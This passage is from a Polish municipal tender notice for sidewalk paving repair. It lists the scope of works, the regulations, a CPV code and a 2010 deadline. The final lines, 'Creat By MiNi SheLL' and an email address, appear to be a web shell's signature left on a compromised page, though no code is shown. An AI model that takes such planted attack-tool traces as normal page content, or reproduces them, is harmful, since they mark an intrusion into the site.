1.ręczne rozebranie nawierzchni z płytek chodnikowych, krawężników, elementów konstrukcji betonowej  i obrzeży betonowych 
2. podbudowę z pospólki pod kostkę betonową 
3. nawierzchnię z kostki brukowej betonowej grubości 6 cm na podsypce cemontowo - piaskowej 
4. prace związanych z montażem obrzeży chodnikowych wibroprasowanych i krawężników
5. regulację pionową istniejących studzienek
6. wywozu gruzu 
Szczegółowy zakres dla każdej części obejmujący przedmiar robót zawarty jest w kosztorysach inwestorskich.
W ramach zamówienia wykonawca zobowiązany jest także do :
1.      Zachowania przepisów BHP,
2.      Wykonawca jako wytwórca odpadów powstających w trakcie trwania realizacji zadania odpowiada za ich składowanie oraz  w razie konieczności powinien uregulować stan formalno-prawny   w zakresie gospodarki odpadami (art. 17 ustawy z dnia 27 kwietnia 2001r. o odpadach Dz. U. Nr 62 poz. 628 z późn. Zmianami),
Przepisy związane
- Ustawa z dnia 07.07.1994 r. - Prawo Budowlane.
- Rozporządzenie Ministra Infrastruktury z dnia 06.02.2003 r w sprawie bezpieczeństwa i   higieny pracy podczas wykonywania robót budowlanych.
Wszystkie roboty należy wykonywać zgodnie z obowiązującymi w Polsce normami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wschodnia 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana nawierzchni chodnikowej wzdłuż budynku Wschodnia 14 do budynku Żwirki Wigury 3 na działce 74/1 i 68/2 ( mapka nr 5) - Część V.
Zakres robót
Roboty, których dotyczy specyfikacja, obejmują wszystkie czynności umożliwiające i mające na celu wykonanie robót związanych z remontem chodników na terenach gminnych 
Do wykonania zadań należy wykonać:
1.ręczne rozebranie nawierzchni z płytek chodnikowych, krawężników, elementów konstrukcji betonowej  i obrzeży betonowych 
2. podbudowę z pospólki pod kostkę betonową 
3. nawierzchnię z kostki brukowej betonowej grubości 6 cm na podsypce cemontowo - piaskowej 
4. prace związanych z montażem obrzeży chodnikowych wibroprasowanych i krawężników
5. regulację pionową istniejących studzienek
6. wywozu gruzu 
Szczegółowy zakres dla każdej części obejmujący przedmiar robót zawarty jest w kosztorysach inwestorskich.
W ramach zamówienia wykonawca zobowiązany jest także do :
1.      Zachowania przepisów BHP,
2.      Wykonawca jako wytwórca odpadów powstających w trakcie trwania realizacji zadania odpowiada za ich składowanie oraz  w razie konieczności powinien uregulować stan formalno-prawny   w zakresie gospodarki odpadami (art. 17 ustawy z dnia 27 kwietnia 2001r. o odpadach Dz. U. Nr 62 poz. 628 z późn. Zmianami),
Przepisy związane
- Ustawa z dnia 07.07.1994 r. - Prawo Budowlane.
- Rozporządzenie Ministra Infrastruktury z dnia 06.02.2003 r w sprawie bezpieczeństwa i   higieny pracy podczas wykonywania robót budowlanych.
Wszystkie roboty należy wykonywać zgodnie z obowiązującymi w Polsce normami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com